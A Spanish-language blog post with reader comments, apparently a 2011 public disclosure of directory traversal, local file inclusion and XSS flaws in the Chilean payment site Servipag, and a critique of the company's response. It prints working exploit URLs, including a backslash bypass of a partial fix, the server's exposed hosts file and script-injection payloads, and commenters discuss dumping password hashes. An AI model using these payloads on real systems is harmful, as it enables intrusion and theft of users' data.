Servipag.cl: El portal chileno de pagos online más inseguro

La idea de este post es dejar al descubierto como reaccionan las empresas cuando se les reporta un problema de seguridad critico, como no son capaces de responder e intentan esconder el error.

Servipag es un servicio para pago de cuentas en linea, muchos usuarios hacen uso de este servicio sin saber realmente a quien estan entregando su información.

En la sección “Quienes somos” podemos ver el siguiente mensaje:

Como es de costumbre de todas estas empresas, todas tienen un “alto estandar de seguridad” y todos invierten millones y millones en las ultimas tecnologias y ultimos estandares de seguridad, pero todos nosotros sabemos que eso es una mentira.

Según ellos:

Seguridad
Contamos con las herramientas de más alto nivel en seguridad y eficiencia que la tecnología virtual ofrece en el mercado actualmente.

Desde hace meses que Servipag.cl es vulnerable a distintos tipos de ataques que afectan directamente al servidor y tambien a los usuarios. Las vulnerabilidades que se reportaron en este sitio son Directory Traversal, Local File Include (LFI) y Cross Site Scripting (XSS).
Al ser reportadas tardaron 2 días en dar una respuesta. Como ya es un hecho en la mayoria de los sitios web, no cuentan con un procedimiento para reportar vulnerabilidades lo que hace más lento todo este proceso. Por twitter, la cuenta @ServipagOnLine comenzó a seguirme y me dijo “Nuestro jefe de proyectos se contactara contigo“, 7 días despues lo único que he recibido es un correo que dice:

Le respondí cómo podía contactarme y eso fue el fin de la conversación.

Las vulnerabilidades

Local File Include & Directory Traversal

Esta vulnerabilidad permite navegar arbitrariamente por los archivos del sistema, pudiendo ver su contenido. La vulnerabilidad se encuentra en el archivo “browse.asp”, al pasarle mediante la variable “pagina” el archivo que deseamos ver, por ejemplo “../../../../../../../../../../../boot.ini”.

Antes de haber enviado el primer reporte de vulnerabilidad, esta vulnerabilidad podia ser explotada añadiendo la ruta del directorio usando los “slash” normales (/), pero magicamente durante la semana y luego de haber sido reportada, la vulnerabilidad ya no podía ser explotada de esa forma, y el sistema mostraba un error:

Pero gracias a la contribución de @1error500, nos dimos cuenta que no había sido solucionado. El programador o quien sea que haya hecho el cambio, lo único que hizo fue un vergonzoso parche, ya que si cambiamos los “slash” por “backslash” (\), podemos explotar nuevamente la vulnerabilidad.

Por ejemplo: https://www.servipag.com/browse.asp?pagina=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&EstadoUsuario=0&TipoConsulta=EXPRESS&IdPagoSolicitado=4008706&IdPeriodoSolicitado=201107

#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost
192.168.2.8www.servipag.com

Una verguenza de seguridad.

Cross Site Scripting (XSS)

Como si fuera poco, este sitio tambien es vulnerable a XSS que afectaba al mismo archivo browse.asp, pero esta vez a la variable “p” y a la variable “mensaje_error” dependiendo de la “pagina” a mostrar.

– https://www.servipag.com/browse.asp?pagina=web/preguntas_frecuentes4.htm&bloque=Pagos%20Preguntas%20Frecuentes1&p=%3Cscript%3Ealert(/XSS/)%3C/script%3E
– https://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

Aparentemente el error está corregido, ya que muestra el mismo mensaje de más arriba. Pero, estará realmente corregido?

Bueno, esto demuestra el horrible manejo de incidentes que tienen las empresas que dicen tener altos estandares de seguridad. Empresas que prometen privacidad y seguridad, hacen que los usuarios confien en ellos y nuevamente quedan al descubierto.

21 comentarios

  1. No me puedo imaginar un peor escenario en un portal de pagos. Generalmente los lfi son muy criticos ya que se puede robar la base de datos pero eso no es lo peor. Pensando en voz alta un atacante puede inscribirse en la pagina colocando en algun campo codigo para tomar el control de la maquina, solo faltaria hacer que el servidor lo procese… como con un lfi por ejemplo. Ojala servipag tome medidas y tome una solucion definitiva a sus problemas de segiridad.

  2. Servipagvalehongo

    julio 31, 2011 a las 11:50 pm

    Que les pueden pedir a Servipag si la pagina solamente funciona con IE? Me aburri de pedirles que por favor la arreglaran para otros navegadores hasta que les mande a la xuxa.

  3. No me sorprenderia ver la SAM del servidor Windows de Servipag en un pastebin en Internet. Con esta vulnerabilidad un atacante puede sacar todas las Hash (passwords) del servidor y crackearlas. Ufff Servipag debe ponerse al dia con esta vulnerabilidad pronto.

  4. Servipagvalehongo:

    Yo he podido usar el sitio con Firefox y Chrome sin dramas. Sin embargo, con esto prefiero ir y pagar en persona

  5. Claramente si tienen DB alojadas en la misma maquina o datos de conexion.. bueno… otra base con datos privados de chilenos que ya no van a ser tan privados.

    De todas formas la mayoria de los bancos tienen interfaces para pagar cuentas (que igual pasan por servipag), esperemos que sean un poco mas seguras.

  6. Desde ahora en adelante ya no me sorprendera cuando vaya a pagar en persona y me digan, se cayo el sistema … por donde los mires se caen a pedasos, servipag online o en persona deja bastante que desear, aplicaciones web vulnerables, y sus sitemas que se “caen” al momento de atender en persona.
    Saludos

  7. Lo critico no es robarse la base de datos, lo más critico seria tomar el control del Server.

    Si alguien toma el control no solo va a ver ese Server sino todo el segmento de red (en el rango de IPs que sale más arriba del hosts en el blog de Zerial) y además por ejemplo sniffear las conexiones que hacen las instituciones con ese servidor… robo de numeros de tarjetas de credito con su código de verificación?, users?, passwords?, OMG!!!!

  8. tristemente comico el asunto, y la forma de responder el mail..

    “Hola Zerial.
    Favor dime como te puedo contartar (fono, Mail,?).”

    jeje.. le pasaste el “fono” ? =)

  9. jaja

    “192.168.2.8www.servipag.com”

  10. Estoy casi seguro que Servipag guarda las contraseñas sin cifrar, esto porque cuando la recuperas te envía la misma.
    Cláramente puede hacerse una encriptación con salt, pero si estamos con este nivel de seguridad yo dudo que almacenen de ese modo las contraseñas.

  11. un día puede que alguien haya robado tu contraseña y te encuentres con tus cuentas pagadas!!!!

  12. se “reparo” el lfi, y la ip del server en la intranet ahora es 192.168.1.10 😀 buscare alguna vulverabilidad para pagar mis cuentas jojojo

  13. jejejeje eso no sólo debe pasar en esa empresa, es cosa de buscar ;), buen artículo!

  14. ¿Ya arreglaron el logín sin HTTPS?

  15. Yo sigo esperando que telefónica arregle su Cloud Computing ¬¬ jajajj

  16. A veces algunas inseguridades son parte del negocio de ellos: si es inseguro te venden seguros 🙁

  17. Y alguien ha revisado el portal miscuentas.com?? Tiene estas vulnerabilidades tambien??

  18. Esta demás ver que hay cero inversion en el desarrollo del sitio debido a que esta hecho en ASP.
    Una mierda de lenguaje de programacion que ya fue desechado por microsoft hace AÑOS.

    UNA VERGUENZA

  19. Zerial

    agosto 3, 2011 a las 8:18 pm

    Renato: Te invito a leer http://blog.zerial.org/seguridad/analisis-de-seguridad-servipag-vs-sencillito-vs-miscuentas

    Luis León Cárdenas Graide : Aun no, todavia es posible iniciar sesion sin https …

  20. hola , me parece gracioso y risorio como se pelean por ver quien tiene la razon o no , en el caso de pago en los servipag , ja ja ja y a la vez lo encuentro estupido , ya que en chilito ( los jaguares de america , un pais en desarroyo) pero hay un pequeño remeson de suelo y se va todo a la mierda , cago el sistema internet , fuera comunicaciones telefonicas , adios bencineras , chao hospitales con sistemas de ventilacion mecanica a enfermos . ja ja ja y uds. peleando por un sistema para idiotas y flojos , si tienes una deuda anda y pagala en persona ,mirale la cara a la probre cajera que esta con su empenada doblada todo un dia sentada . ahhh y cuando estas en la fila de cualquier entida publica mas de una hora en espera uuuufff se cayo el sistema sorry ja ja ja . y que hace la gente reclama ??? a quien ???? y me hablan de tecnologia de avanzada ja ja ja ja

  21. Tiene razon Alvaroveliz las contraseñas estan sin cifrar, es mas la pregunta secreta tambien se encuentra con el mismo problema.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Esto sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.